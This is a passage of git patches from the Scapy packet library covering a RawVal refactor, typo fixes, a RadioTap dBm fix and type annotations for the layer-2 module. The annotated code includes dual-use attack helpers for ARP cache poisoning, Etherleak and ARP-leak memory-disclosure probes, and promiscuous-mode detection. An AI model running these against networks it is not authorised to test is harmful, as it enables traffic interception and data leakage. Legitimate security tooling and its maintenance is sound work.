self.type = 1 if isinstance(self.getfieldval('data'), HPackZString) else 0 # noqa: E501 - return super(HPackHdrString, self).self_build(field_pos_list) + return super(HPackHdrString, self).self_build(**kwargs) class HPackHeaders(packet.Packet): diff --git a/scapy/contrib/icmp_extensions.py b/scapy/contrib/icmp_extensions.py index b2fa0fea3ac..a0e5e96f7bb 100644 --- a/scapy/contrib/icmp_extensions.py +++ b/scapy/contrib/icmp_extensions.py @@ -161,7 +161,7 @@ class ICMPExtensionInterfaceInformation(ICMPExtensionObject): IntField('mtu', None), lambda pkt: pkt.has_mtu == 1)] - def self_build(self, field_pos_list=None): + def self_build(self, **kwargs): if self.afi is None: if self.ip4 is not None: self.afi = 1 @@ -179,7 +179,7 @@ def self_build(self, field_pos_list=None): if self.has_mtu and self.mtu is None: warning('has_mtu set but mtu is not set.') - return ICMPExtensionObject.self_build(self, field_pos_list=field_pos_list) # noqa: E501 + return ICMPExtensionObject.self_build(self, **kwargs) # Add the post_dissection() method to the existing ICMPv4 and diff --git a/scapy/fields.py b/scapy/fields.py index 1d9568de8d9..6985694d8a2 100644 --- a/scapy/fields.py +++ b/scapy/fields.py @@ -65,12 +65,43 @@ from scapy.packet import Packet -""" -Helper class to specify a protocol extendable for runtime modifications -""" +class RawVal: + r""" + A raw value that will not be processed by the field and inserted + as-is in the packet string. + + Example:: + + >>> a = IP(len=RawVal("####")) + >>> bytes(a) + b'F\x00####\x00\x01\x00\x005\xb5\x00\x00\x7f\x00\x00\x01\x7f\x00\x00\x01\x00\x00' + + """ + def __init__(self, val=b""): + # type: (bytes) -> None + self.val = bytes_encode(val) + + def __str__(self): + # type: () -> str + return str(self.val) + + def __bytes__(self): + # type: () -> bytes + return self.val + + def __len__(self): + # type: () -> int + return len(self.val) + + def __repr__(self): + # type: () -> str + return "" % self.val class ObservableDict(Dict[int, str]): + """ + Helper class to specify a protocol extendable for runtime modifications + """ def __init__(self, *args, **kw): # type: (*Dict[int, str], **Any) -> None self.observers = [] # type: List[_EnumField[Any]] @@ -148,6 +179,8 @@ def i2len(self, ): # type: (...) -> int """Convert internal value to a length usable by a FieldLenField""" + if isinstance(x, RawVal): + return len(x) return self.sz def i2count(self, pkt, x): @@ -197,7 +230,15 @@ def addfield(self, pkt, s, val): Copy the network representation of field `val` (belonging to layer `pkt`) to the raw string packet `s`, and return the new string packet. """ - return s + self.struct.pack(self.i2m(pkt, val)) + try: + return s + self.struct.pack(self.i2m(pkt, val)) + except struct.error as ex: + raise ValueError( + "Incorrect type of value for field %s:\n" % self.name + + "struct.error('%s')\n" % ex + + "To inject bytes into the field regardless of the type, " + + "use RawVal. See help(RawVal)" + ) def getfield(self, pkt, s): # type: (Packet, bytes) -> Tuple[bytes, I] @@ -1243,6 +1284,8 @@ def __init__(self, name, default, fmt="H", remain=0): def i2len(self, pkt, x): # type: (Optional[Packet], Any) -> int + if x is None: + return 0 return len(x) def any2i(self, pkt, x): diff --git a/scapy/layers/http.py b/scapy/layers/http.py index 2e70546f022..eb2bc5ae232 100644 --- a/scapy/layers/http.py +++ b/scapy/layers/http.py @@ -375,7 +375,7 @@ def post_build(self, pkt, pay): ) return pkt + pay - def self_build(self, field_pos_list=None): + def self_build(self, **kwargs): ''' Takes an HTTPRequest or HTTPResponse object, and creates its string representation.''' if not isinstance(self.underlayer, HTTP): diff --git a/scapy/packet.py b/scapy/packet.py index 8a96d4b4c90..dba14cc0117 100644 --- a/scapy/packet.py +++ b/scapy/packet.py @@ -34,6 +34,7 @@ MultiEnumField, MultipleTypeField, PacketListField, + RawVal, StrField, ) from scapy.config import conf, _version_checker @@ -69,24 +70,6 @@ pass -class RawVal: - def __init__(self, val=""): - # type: (str) -> None - self.val = val - - def __str__(self): - # type: () -> str - return str(self.val) - - def __bytes__(self): - # type: () -> bytes - return bytes_encode(self.val) - - def __repr__(self): - # type: () -> str - return "" % self.val - - _T = TypeVar("_T", Dict[str, Any], Optional[Dict[str, Any]]) @@ -652,8 +635,8 @@ def clear_cache(self): fsubval.clear_cache() self.payload.clear_cache() - def self_build(self, field_pos_list=None): - # type: (Optional[Any])-> bytes + def self_build(self): + # type: () -> bytes """ Create the default layer regarding fields_desc dict @@ -672,10 +655,7 @@ def self_build(self, field_pos_list=None): for f in self.fields_desc: val = self.getfieldval(f.name) if isinstance(val, RawVal): - sval = raw(val) - p += sval - if field_pos_list is not None: - field_pos_list.append((f.name, sval, len(p), len(sval))) + p += bytes(val) else: p = f.addfield(self, p, val) return p diff --git a/test/regression.uts b/test/regression.uts index 0ad81bfba43..034f87917c0 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -2686,6 +2686,11 @@ p = IP(raw(p)) assert p.len == 0 += IP with RawVal + +pkt = IP(src="127.0.0.1", dst="127.0.0.1", ttl=RawVal(b"\x01\x02\x03\x04")) +assert raw(pkt) == b'F\x00\x00\x18\x00\x01\x00\x00\x01\x02\xb2\xe2\x00\x00\x00\x7f\x00\x00\x01\x7f\x00\x00\x01\x00' + = TCP payload with IP Total Length 0 data = b'1234567890abcdef123456789ABCDEF' pkt = IP()/TCP()/data @@ -4629,6 +4634,10 @@ assert isinstance(p.payload, NoPayload) p = ARP(pdst='192.168.178.0/24') assert "Net" in repr(p) += Test RawVal on ARP + +pkt = ARP(psrc="1.1.1.1", hwtype=RawVal(b"test")) +assert bytes(pkt) == b'test\x08\x00\x00\x04\x00\x01\x01\x01\x01\x01\x00\x00\x00\x00' ############ ############ From 71194ce5e699d96d70efc2c8bba7873be6602b54 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Wed, 25 Nov 2020 15:39:13 +0100 Subject: [PATCH 0411/1632] Add Ether and ether to codespell ignore and fixed other codespell issues (#2981) * Add Ether and ether to codespell ignore * Fix codespell --- .config/codespell_ignore.txt | 2 ++ scapy/automaton.py | 4 ++-- scapy/main.py | 8 ++++---- scapy/tools/check_asdis.py | 6 +++--- 4 files changed, 11 insertions(+), 9 deletions(-) diff --git a/.config/codespell_ignore.txt b/.config/codespell_ignore.txt index 8fb26b48a3b..2db67c3c2d1 100644 --- a/.config/codespell_ignore.txt +++ b/.config/codespell_ignore.txt @@ -28,3 +28,5 @@ vas wan wanna webp +Ether +ether diff --git a/scapy/automaton.py b/scapy/automaton.py index 7a00a36594c..69751a0db9b 100644 --- a/scapy/automaton.py +++ b/scapy/automaton.py @@ -112,10 +112,10 @@ def register_hook(self, hook): """DEV: When call_release() will be called, the hook will also""" self.hooks.append(hook) - def call_release(self, arborted=False): + def call_release(self, aborted=False): """DEV: Must be call when the object becomes ready to read. Relesases the lock of _wait_non_ressources""" - self.was_ended = arborted + self.was_ended = aborted try: self.trigger.release() except (threading.ThreadError, AttributeError): diff --git a/scapy/main.py b/scapy/main.py index 1ac67f3055b..b5c04351ca9 100644 --- a/scapy/main.py +++ b/scapy/main.py @@ -516,20 +516,20 @@ def interact(mydict=None, argv=None, mybanner=None, loglevel=logging.INFO): try: opts = getopt.getopt(argv[1:], "hs:Cc:Pp:d:H") - for opt, parm in opts[0]: + for opt, param in opts[0]: if opt == "-h": _usage() elif opt == "-H": conf.fancy_prompt = False conf.verb = 30 elif opt == "-s": - session_name = parm + session_name = param elif opt == "-c": - STARTUP_FILE = parm + STARTUP_FILE = param elif opt == "-C": STARTUP_FILE = None elif opt == "-p": - PRESTART_FILE = parm + PRESTART_FILE = param elif opt == "-P": PRESTART_FILE = None elif opt == "-d": diff --git a/scapy/tools/check_asdis.py b/scapy/tools/check_asdis.py index 468aa81bfac..11873260cf9 100755 --- a/scapy/tools/check_asdis.py +++ b/scapy/tools/check_asdis.py @@ -19,14 +19,14 @@ def main(argv): VERBOSE = 0 try: opts = getopt.getopt(argv, "hi:o:azdv") - for opt, parm in opts[0]: + for opt, param in opts[0]: if opt == "-h": usage() raise SystemExit elif opt == "-i": - PCAP_IN = parm + PCAP_IN = param elif opt == "-o": - PCAP_OUT = parm + PCAP_OUT = param elif opt == "-v": VERBOSE += 1 elif opt == "-d": From d8be52e952ddbbd70eb96be0e6bd13ca9ca0d90a Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Wed, 25 Nov 2020 16:41:32 +0100 Subject: [PATCH 0412/1632] Fix dBm computation --- scapy/layers/dot11.py | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/scapy/layers/dot11.py b/scapy/layers/dot11.py index 3a94f84a53b..11dd45e483c 100644 --- a/scapy/layers/dot11.py +++ b/scapy/layers/dot11.py @@ -348,13 +348,13 @@ class RadioTap(Packet): lambda pkt: pkt.present and pkt.present.Channel), # dBm_AntSignal ConditionalField( - ScalingField("dBm_AntSignal", 0, offset=-256, - unit="dBm", fmt="B"), + ScalingField("dBm_AntSignal", 0, + unit="dBm", fmt="b"), lambda pkt: pkt.present and pkt.present.dBm_AntSignal), # dBm_AntNoise ConditionalField( - ScalingField("dBm_AntNoise", 0, offset=-256, - unit="dBm", fmt="B"), + ScalingField("dBm_AntNoise", 0, + unit="dBm", fmt="b"), lambda pkt: pkt.present and pkt.present.dBm_AntNoise), # Lock_Quality ConditionalField( From a16d2bf02193b3b72e39f4c6f6566f2ca7a072d0 Mon Sep 17 00:00:00 2001 From: Haggai Eran Date: Thu, 26 Nov 2020 15:45:56 +0200 Subject: [PATCH 0413/1632] L2 layer typing (#2863) * Change type of Packet.fields_desc to a Sequence Sequences in mypy allow variance, so we can assign lists of Field subtypes to fields_desc. This is needed for the scapy.layers.l2.Loopback class, which attempts to assign fields_desc twice with different types. Without this change, we get the following mypy errors: scapy/layers/l2.py:620: error: Incompatible types in assignment (expression has type "List[IntEnumField]", base class "Packet" defined the type as "List[Union[Field[Any, Any], _FieldContainer]]") scapy/layers/l2.py:620: note: "List" is invariant -- see http://mypy.readthedocs.io/en/latest/common_issues.html#variance scapy/layers/l2.py:620: note: Consider using "Sequence" instead, which is covariant * Store just the hw address in the ARP cache in arping The current code stores a pair of the address and the current time, but this does not seem to match the cache's code where the time is stored in a different field. * Fix GRErouting.routing_info length routing_info is a StrLenField, and accepts a lambda (now that the fld argument was removed). * Add type annotations to scapy.layers.l2 - Add typed attribute for Conf.neighbor in scapy.config. This allows mypy to acknowledge the existence of this attribute even though it is not initialized until the scapy.layers.l2 module is loaded. - Name the arp cache as a private global in layers.l2 To avoid mypy warnings about arp_cache not being a member of the NetCache class, store it in its own variable. - Do not accept None in ConditionalField's condition callback The callback is always called with a packet. - The MACField internal representation may be None Modify the types and the i2repr implementation accordingly. - Allow StrFixedLenField default argument to be None A None default is passed in scapy.layers.l2 for example. - Explicitly return None in Neighbor.resolve() - Use super() to access MACField.i2h When accessing the i2h method using an unbound method, mypy fails matching the types correctly. - Convert a few string literals to bytes literals in scapy.layers.l2 - ShortEnumField accepts Dict[str, int] as well as Dict[int, str] - Do not accept None in StrFixedLenField length_from callback The callback is almost always called with a packet, and most of its usage is with a lambda function that does not handle None. Add `type: ignore` comment to the randval method that does pass None to this callback (inside a try-except clause). --- .config/mypy/mypy_enabled.txt | 1 + scapy/compat.py | 2 + scapy/config.py | 5 +- scapy/fields.py | 23 +++--- scapy/layers/l2.py | 130 ++++++++++++++++++++++++++-------- scapy/packet.py | 7 +- 6 files changed, 126 insertions(+), 42 deletions(-) diff --git a/.config/mypy/mypy_enabled.txt b/.config/mypy/mypy_enabled.txt index a2e756b1430..732d70424af 100644 --- a/.config/mypy/mypy_enabled.txt +++ b/.config/mypy/mypy_enabled.txt @@ -34,3 +34,4 @@ scapy/utils6.py scapy/contrib/roce.py scapy/layers/can.py scapy/contrib/automotive/gm/gmlanutils.py +scapy/layers/l2.py diff --git a/scapy/compat.py b/scapy/compat.py index 29a767b851f..471652bc5df 100644 --- a/scapy/compat.py +++ b/scapy/compat.py @@ -36,6 +36,7 @@ 'Pattern', 'Sequence', 'Set', + 'Sequence', 'Sized', 'Tuple', 'Type', @@ -154,6 +155,7 @@ def cast(_type, obj): # type: ignore Pattern = _FakeType("Pattern") # type: ignore Sequence = _FakeType("Sequence") # type: ignore Set = _FakeType("Set", set) # type: ignore + Sequence = _FakeType("Sequence", list) # type: ignore Tuple = _FakeType("Tuple") Type = _FakeType("Type", type) TypeVar = _FakeType("TypeVar") # type: ignore diff --git a/scapy/config.py b/scapy/config.py index b98249b79a2..bda89dcdd41 100755 --- a/scapy/config.py +++ b/scapy/config.py @@ -462,9 +462,10 @@ def add_cache(self, cache): setattr(self, cache.name, cache) def new_cache(self, name, timeout=None): - # type: (str, Optional[int]) -> None + # type: (str, Optional[int]) -> CacheInstance c = CacheInstance(name=name, timeout=timeout) self.add_cache(c) + return c def __delattr__(self, attr): # type: (str) -> NoReturn @@ -755,6 +756,8 @@ class Conf(ConfClass): ifaces = None # type: 'scapy.interfaces.NetworkInterfaceDict' #: holds the cache of interfaces loaded from Libpcap cache_iflist = {} # type: Dict[str, Tuple[str, List[str], int]] + neighbor = None # type: 'scapy.layers.l2.Neighbor' + # `neighbor` will be filed by scapy.layers.l2 #: holds the Scapy IPv4 routing table and provides methods to #: manipulate it route = None # type: 'scapy.route.Route' diff --git a/scapy/fields.py b/scapy/fields.py index 6985694d8a2..734c1177a94 100644 --- a/scapy/fields.py +++ b/scapy/fields.py @@ -344,7 +344,7 @@ class ConditionalField(_FieldContainer): def __init__(self, fld, # type: Field[Any, Any] - cond # type: Callable[[Optional[Packet]], bool] + cond # type: Callable[[Packet], bool] ): # type: (...) -> None self.fld = fld @@ -673,7 +673,7 @@ def bind_addr(cls, layer, addr, **condition): ) -class MACField(Field[str, bytes]): +class MACField(Field[Optional[str], bytes]): def __init__(self, name, default): # type: (str, Optional[Any]) -> None Field.__init__(self, name, default, "6s") @@ -699,8 +699,10 @@ def any2i(self, pkt, x): return cast(str, x) def i2repr(self, pkt, x): - # type: (Optional[Packet], str) -> str + # type: (Optional[Packet], Optional[str]) -> str x = self.i2h(pkt, x) + if x is None: + return repr(x) if self in conf.resolve: x = conf.manufdb._resolve_MAC(x) return x @@ -1641,9 +1643,9 @@ class StrFixedLenField(StrField): def __init__( self, name, # type: str - default, # type: bytes + default, # type: Optional[bytes] length=None, # type: Optional[int] - length_from=None, # type: Optional[Callable[[Optional[Packet]], int]] # noqa: E501 + length_from=None, # type: Optional[Callable[[Packet], int]] # noqa: E501 ): # type: (...) -> None super(StrFixedLenField, self).__init__(name, default) @@ -1675,7 +1677,7 @@ def addfield(self, pkt, s, val): def randval(self): # type: () -> RandBin try: - len_pkt = self.length_from(None) + len_pkt = self.length_from(None) # type: ignore except Exception: len_pkt = RandNum(0, 200) return RandBin(len_pkt) @@ -2266,7 +2268,7 @@ class _EnumField(Field[Union[List[I], I], I]): def __init__(self, name, # type: str default, # type: Optional[I] - enum, # type: Union[Dict[I, str], List[str], DADict[I, str], Tuple[Callable[[I], str], Callable[[str], I]]] # noqa: E501 + enum, # type: Union[Dict[I, str], Dict[str, I], List[str], DADict[I, str], Tuple[Callable[[I], str], Callable[[str], I]]] # noqa: E501 fmt="H", # type: str ): # type: (...) -> None @@ -2307,8 +2309,9 @@ def __init__(self, if any(isinstance(x, str) for x in keys): i2s, s2i = s2i, i2s # type: ignore for k in keys: - i2s[k] = enum[k] - s2i[enum[k]] = k + value = cast(str, enum[k]) + i2s[k] = value + s2i[value] = k Field.__init__(self, name, default, fmt) def any2i_one(self, pkt, x): @@ -2427,7 +2430,7 @@ class ShortEnumField(EnumField[int]): def __init__(self, name, # type: str default, # type: int - enum, # type: Union[Dict[int, str], Tuple[Callable[[int], str], Callable[[str], int]], DADict[int, str]] # noqa: E501 + enum, # type: Union[Dict[int, str], Dict[str, int], Tuple[Callable[[int], str], Callable[[str], int]], DADict[int, str]] # noqa: E501 ): # type: (...) -> None EnumField.__init__(self, name, default, enum, "H") diff --git a/scapy/layers/l2.py b/scapy/layers/l2.py index aa377c6675c..277b81e3f78 100644 --- a/scapy/layers/l2.py +++ b/scapy/layers/l2.py @@ -53,15 +53,30 @@ ) from scapy.modules.six import viewitems from scapy.packet import bind_layers, Packet -from scapy.plist import PacketList, SndRcvList +from scapy.plist import PacketList, SndRcvList, _PacketList from scapy.sendrecv import sendp, srp, srp1 from scapy.utils import checksum, hexdump, hexstr, inet_ntoa, inet_aton, \ mac2str, valid_mac, valid_net, valid_net6 +from scapy.compat import ( + Any, + Callable, + Dict, + List, + Optional, + Tuple, + Type, + Union, + cast, +) +from scapy.interfaces import NetworkInterface if conf.route is None: # unused import, only to initialize conf.route import scapy.route # noqa: F401 +# type definitions +_ResolverCallable = Callable[[Packet, Packet], Optional[str]] + ################# # Tools # ################# @@ -69,27 +84,34 @@ class Neighbor: def __init__(self): - self.resolvers = {} + # type: () -> None + self.resolvers = {} # type: Dict[Tuple[Type[Packet], Type[Packet]], _ResolverCallable] # noqa: E501 def register_l3(self, l2, l3, resolve_method): + # type: (Type[Packet], Type[Packet], _ResolverCallable) -> None self.resolvers[l2, l3] = resolve_method def resolve(self, l2inst, l3inst): + # type: (Ether, Packet) -> Optional[str] k = l2inst.__class__, l3inst.__class__ if k in self.resolvers: return self.resolvers[k](l2inst, l3inst) + return None def __repr__(self): + # type: () -> str return "\n".join("%-15s -> %-15s" % (l2.__name__, l3.__name__) for l2, l3 in self.resolvers) # noqa: E501 conf.neighbor = Neighbor() -conf.netcache.new_cache("arp_cache", 120) # cache entries expire after 120s +# cache entries expire after 120s +_arp_cache = conf.netcache.new_cache("arp_cache", 120) @conf.commands.register def getmacbyip(ip, chainCC=0): + # type: (str, int) -> Optional[str] """Return MAC address corresponding to a given IP address""" if isinstance(ip, Net): ip = next(iter(ip)) @@ -103,7 +125,7 @@ def getmacbyip(ip, chainCC=0): if gw != "0.0.0.0": ip = gw - mac = conf.netcache.arp_cache.get(ip) + mac = _arp_cache.get(ip) if mac: return mac @@ -120,7 +142,7 @@ def getmacbyip(ip, chainCC=0): return None if res is not None: mac = res.payload.hwsrc - conf.netcache.arp_cache[ip] = mac + _arp_cache[ip] = mac return mac return None @@ -129,10 +151,12 @@ def getmacbyip(ip, chainCC=0): class DestMACField(MACField): def __init__(self, name): + # type: (str) -> None MACField.__init__(self, name, None) def i2h(self, pkt, x): - if x is None: + # type: (Optional[Ether], Optional[str]) -> str + if x is None and pkt is not None: try: x = conf.neighbor.resolve(pkt, pkt.payload) except socket.error: @@ -143,9 +167,10 @@ def i2h(self, pkt, x): else: x = "ff:ff:ff:ff:ff:ff" warning("Mac address to reach destination not found. Using broadcast.") # noqa: E501 - return MACField.i2h(self, pkt, x) + return super(DestMACField, self).i2h(pkt, x) def i2m(self, pkt, x): + # type: (Optional[Ether], Optional[str]) -> bytes return MACField.i2m(self, pkt, self.i2h(pkt, x)) @@ -153,10 +178,12 @@ class SourceMACField(MACField): __slots__ = ["getif"] def __init__(self, name, getif=None): + # type: (str, Optional[Any]) -> None MACField.__init__(self, name, None) self.getif = (lambda pkt: pkt.route()[0]) if getif is None else getif def i2h(self, pkt, x): + # type: (Optional[Packet], Optional[str]) -> str if x is None: iff = self.getif(pkt) if iff is None: @@ -168,9 +195,10 @@ def i2h(self, pkt, x): warning("Could not get the source MAC: %s" % e) if x is None: x = "00:00:00:00:00:00" - return MACField.i2h(self, pkt, x) + return super(SourceMACField, self).i2h(pkt, x) def i2m(self, pkt, x): + # type: (Optional[Ether], Optional[Any]) -> bytes return MACField.i2m(self, pkt, self.i2h(pkt, x)) @@ -188,19 +216,23 @@ class Ether(Packet): __slots__ = ["_defrag_pos"] def hashret(self): + # type: () -> bytes return struct.pack("H", self.type) + self.payload.hashret() def answers(self, other): + # type: (Packet) -> int if isinstance(other, Ether): if self.type == other.type: return self.payload.answers(other.payload) return 0 def mysummary(self): + # type: () -> str return self.sprintf("%src% > %dst% (%type%)") @classmethod def dispatch_hook(cls, _pkt=None, *args, **kargs): + # type: (Optional[bytes], *Any, **Any) -> Type[Packet] if _pkt and len(_pkt) >= 14: if struct.unpack("!H", _pkt[12:14])[0] <= 1500: return Dot3 @@ -214,19 +246,23 @@ class Dot3(Packet): LenField("len", None, "H")] def extract_padding(self, s): + # type: (bytes) -> Tuple[bytes, bytes] tmp_len = self.len return s[:tmp_len], s[tmp_len:] def answers(self, other): + # type: (Ether) -> int if isinstance(other, Dot3): return self.payload.answers(other.payload) return 0 def mysummary(self): + # type: () -> str return "802.3 %s > %s" % (self.src, self.dst) @classmethod def dispatch_hook(cls, _pkt=None, *args, **kargs): + # type: (Optional[Any], *Any, **Any) -> Type[Packet] if _pkt and len(_pkt) >= 14: if struct.unpack("!H", _pkt[12:14])[0] > 1500: return Ether @@ -241,7 +277,9 @@ class LLC(Packet): def l2_register_l3(l2, l3): - return conf.neighbor.resolve(l2, l3.payload) + # type: (Packet, Packet) -> Optional[str] + neighbor = conf.neighbor # type: Neighbor + return neighbor.resolve(l2, l3.payload) conf.neighbor.register_l3(Ether, LLC, l2_register_l3) @@ -259,7 +297,7 @@ class CookedLinux(Packet): 4: "sent-by-us"}), XShortField("lladdrtype", 512), ShortField("lladdrlen", 0), - StrFixedLenField("src", "", 8), + StrFixedLenField("src", b"", 8), XShortEnumField("proto", 0x800, ETHER_TYPES)] @@ -288,6 +326,7 @@ class Dot1Q(Packet): XShortEnumField("type", 0x0000, ETHER_TYPES)] def answers(self, other): + # type: (Packet) -> int if isinstance(other, Dot1Q): if ((self.type == other.type) and (self.vlan == other.vlan)): @@ -297,16 +336,19 @@ def answers(self, other): return 0 def default_payload_class(self, pay): + # type: (bytes) -> Type[Packet] if self.type <= 1500: return LLC return conf.raw_layer def extract_padding(self, s): + # type: (bytes) -> Tuple[bytes, Optional[bytes]] if self.type <= 1500: return s[:self.type], s[self.type:] return s, None def mysummary(self): + # type: () -> str if isinstance(self.underlayer, Ether): return self.underlayer.sprintf("802.1q %Ether.src% > %Ether.dst% (%Dot1Q.type%) vlan %Dot1Q.vlan%") # noqa: E501 else: @@ -413,36 +455,43 @@ class ARP(Packet): ] def hashret(self): + # type: () -> bytes return struct.pack(">HHH", self.hwtype, self.ptype, ((self.op + 1) // 2)) + self.payload.hashret() def answers(self, other): + # type: (Packet) -> int if not isinstance(other, ARP): return False if self.op != other.op + 1: return False # We use a loose comparison on psrc vs pdst to catch answers # with ARP leaks - self_psrc = self.get_field('psrc').i2m(self, self.psrc) - other_pdst = other.get_field('pdst').i2m(other, other.pdst) + self_psrc = self.get_field('psrc').i2m(self, self.psrc) # type: bytes + other_pdst = other.get_field('pdst').i2m(other, other.pdst) \ + # type: bytes return self_psrc[:len(other_pdst)] == other_pdst[:len(self_psrc)] def route(self): - fld, dst = self.getfield_and_val("pdst") - fld, dst = fld._find_fld_pkt_val(self, dst) + # type: () -> Tuple[Union[NetworkInterface, str, None], Optional[str], Optional[str]] # noqa: E501 + fld, dst = cast(Tuple[MultipleTypeField, str], + self.getfield_and_val("pdst")) + fld_inner, dst = fld._find_fld_pkt_val(self, dst) if isinstance(dst, Gen): dst = next(iter(dst)) - if isinstance(fld, IP6Field): + if isinstance(fld_inner, IP6Field): return conf.route6.route(dst) - elif isinstance(fld, IPField): + elif isinstance(fld_inner, IPField): return conf.route.route(dst) else: return None, None, None def extract_padding(self, s): - return "", s + # type: (bytes) -> Tuple[bytes, bytes] + return b"", s def mysummary(self): + # type: () -> str if self.op == 1: return self.sprintf("ARP who has %pdst% says %psrc%") if self.op == 2: @@ -451,6 +500,7 @@ def mysummary(self): def l2_register_l3_arp(l2, l3): + # type: (Type[Packet], Type[Packet]) -> Optional[str] return getmacbyip(l3.pdst) @@ -462,7 +512,8 @@ class GRErouting(Packet): fields_desc = [ShortField("address_family", 0), ByteField("SRE_offset", 0), FieldLenField("SRE_len", None, "routing_info", "B"), - StrLenField("routing_info", "", "SRE_len"), + StrLenField("routing_info", b"", + length_from=lambda pkt: pkt.SRE_len), ] @@ -488,11 +539,13 @@ class GRE(Packet): @classmethod def dispatch_hook(cls, _pkt=None, *args, **kargs): + # type: (Optional[Any], *Any, **Any) -> Type[Packet] if _pkt and struct.unpack("!H", _pkt[2:4])[0] == 0x880b: return GRE_PPTP return cls def post_build(self, p, pay): + # type: (bytes, bytes) -> bytes p += pay if self.chksum_present and self.chksum is None: c = checksum(p) @@ -527,6 +580,7 @@ class GRE_PPTP(GRE): ConditionalField(XIntField("ack_number", None), lambda pkt: pkt.acknum_present == 1)] # noqa: E501 def post_build(self, p, pay): + # type: (bytes, bytes) -> bytes p += pay if self.payload_len is None: pay_len = len(pay) @@ -539,10 +593,12 @@ def post_build(self, p, pay): class LoIntEnumField(IntEnumField): def m2i(self, pkt, x): + # type: (Optional[Packet], int) -> int return x >> 24 def i2m(self, pkt, x): - return x << 24 + # type: (Optional[Packet], Union[List[int], int, None]) -> int + return cast(int, x) << 24 # https://github.com/wireshark/wireshark/blob/fe219637a6748130266a0b0278166046e60a2d68/epan/dissectors/packet-null.c @@ -619,6 +675,7 @@ class Dot1AD(Dot1Q): @conf.commands.register def arpcachepoison(target, victim, interval=60): + # type: (str, str, int) -> None """Poison target's cache with (your MAC,victim's IP) couple arpcachepoison(target, victim, [interval=60]) -> None """ @@ -635,10 +692,15 @@ def arpcachepoison(target, victim, interval=60): class ARPingResult(SndRcvList): - def __init__(self, res=None, name="ARPing", stats=None): + def __init__(self, + res=None, # type: Optional[Union[_PacketList[Tuple[Packet, Packet]], List[Tuple[Packet, Packet]]]] # noqa: E501 + name="ARPing", # type: str + stats=None # type: Optional[List[Type[Packet]]] + ): SndRcvList.__init__(self, res, name, stats) - def show(self): + def show(self, *args, **kwargs): + # type: (*Any, **Any) -> None """ Print the list of discovered MAC addresses. """ @@ -658,6 +720,7 @@ def show(self): @conf.commands.register def arping(net, timeout=2, cache=0, verbose=None, **kargs): + # type: (str, int, int, Optional[int], **Any) -> Tuple[ARPingResult, PacketList] # noqa: E501 """Send ARP who-has requests to determine which hosts are up arping(net, [cache=0,] [iface=conf.iface,] [verbose=conf.verb]) -> None Set cache=True if you want arping to modify internal ARP-Cache""" @@ -669,7 +732,7 @@ def arping(net, timeout=2, cache=0, verbose=None, **kargs): if cache and ans is not None: for pair in ans: - conf.netcache.arp_cache[pair[1].psrc] = (pair[1].hwsrc, time.time()) # noqa: E501 + _arp_cache[pair[1].psrc] = pair[1].hwsrc if ans is not None and verbose: ans.show() return ans, unans @@ -677,6 +740,7 @@ def arping(net, timeout=2, cache=0, verbose=None, **kargs): @conf.commands.register def is_promisc(ip, fake_bcast="ff:ff:00:00:00:00", **kargs): + # type: (str, str, **Any) -> bool """Try to guess if target is in Promisc mode. The target is provided by its ip.""" # noqa: E501 responses = srp1(Ether(dst=fake_bcast) / ARP(op="who-has", pdst=ip), type=ETH_P_ARP, iface_hint=ip, timeout=1, verbose=0, **kargs) # noqa: E501 @@ -686,6 +750,7 @@ def is_promisc(ip, fake_bcast="ff:ff:00:00:00:00", **kargs): @conf.commands.register def promiscping(net, timeout=2, fake_bcast="ff:ff:ff:ff:ff:fe", **kargs): + # type: (str, int, str, **Any) -> Tuple[ARPingResult, PacketList] """Send ARP who-has requests to determine which hosts are in promiscuous mode promiscping(net, iface=conf.iface)""" ans, unans = srp(Ether(dst=fake_bcast) / ARP(pdst=net), @@ -728,17 +793,22 @@ class ARP_am(AnsweringMachine): send_function = staticmethod(sendp) def parse_options(self, IP_addr=None, ARP_addr=None): + # type: (Optional[str], Optional[str]) -> None self.IP_addr = IP_addr self.ARP_addr = ARP_addr def is_request(self, req): - return (req.haslayer(ARP) and - req.getlayer(ARP).op == 1 and - (self.IP_addr is None or self.IP_addr == req.getlayer(ARP).pdst)) # noqa: E501 + # type: (Ether) -> bool + if not req.haslayer(ARP): + return False + arp = req[ARP] + return arp.op == 1 and \ + (self.IP_addr is None or self.IP_addr == arp.pdst) # noqa: E501 def make_reply(self, req): - ether = req.getlayer(Ether) - arp = req.getlayer(ARP) + # type: (Ether) -> Ether + ether = req[Ether] + arp = req[ARP] if 'iface' in self.optsend: iff = self.optsend.get('iface') @@ -761,17 +831,20 @@ def make_reply(self, req): return resp def send_reply(self, reply): + # type: (ARP) -> None if 'iface' in self.optsend: self.send_function(reply, **self.optsend) else: self.send_function(reply, iface=self.iff, **self.optsend) def print_reply(self, req, reply): + # type: (Ether, Ether) -> None print("%s ==> %s on %s" % (req.summary(), reply.summary(), self.iff)) @conf.commands.register def etherleak(target, **kargs): + # type: (str, **Any) -> Tuple[SndRcvList, PacketList] """Exploit Etherleak flaw""" return srp(Ether() / ARP(pdst=target), prn=lambda s_r: conf.padding_layer in s_r[1] and hexstr(s_r[1][conf.padding_layer].load), # noqa: E501 @@ -780,13 +853,14 @@ def etherleak(target, **kargs): @conf.commands.register def arpleak(target, plen=255, hwlen=255, **kargs): + # type: (str, int, int, **Any) -> Tuple[SndRcvList, PacketList] """Exploit ARP leak flaws, like NetBSD-SA2017-002. https://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2017-002.txt.asc """ # We want explicit packets - pkts_iface = {} + pkts_iface = {} # type: Dict[str, List[Ether]] for pkt in ARP(pdst=target): # We have to do some of Scapy's work since we mess with # important values diff --git a/scapy/packet.py b/scapy/packet.py index dba14cc0117..df086f81f2e 100644 --- a/scapy/packet.py +++ b/scapy/packet.py @@ -62,6 +62,7 @@ Type, TypeVar, Union, + Sequence, cast, ) try: @@ -94,7 +95,7 @@ class Packet(six.with_metaclass(Packet_metaclass, # type: ignore "wirelen", ] name = None - fields_desc = [] # type: List[AnyField] + fields_desc = [] # type: Sequence[AnyField] deprecated_fields = {} # type: Dict[str, Tuple[str, str]] overload_fields = {} # type: Dict[Type[Packet], Dict[str, Any]] payload_guess = [] # type: List[Tuple[Dict[str, Any], Type[Packet]]] @@ -239,7 +240,7 @@ def init_fields(self): self.do_init_cached_fields() def do_init_fields(self, - flist, # type: List[AnyField] + flist, # type: 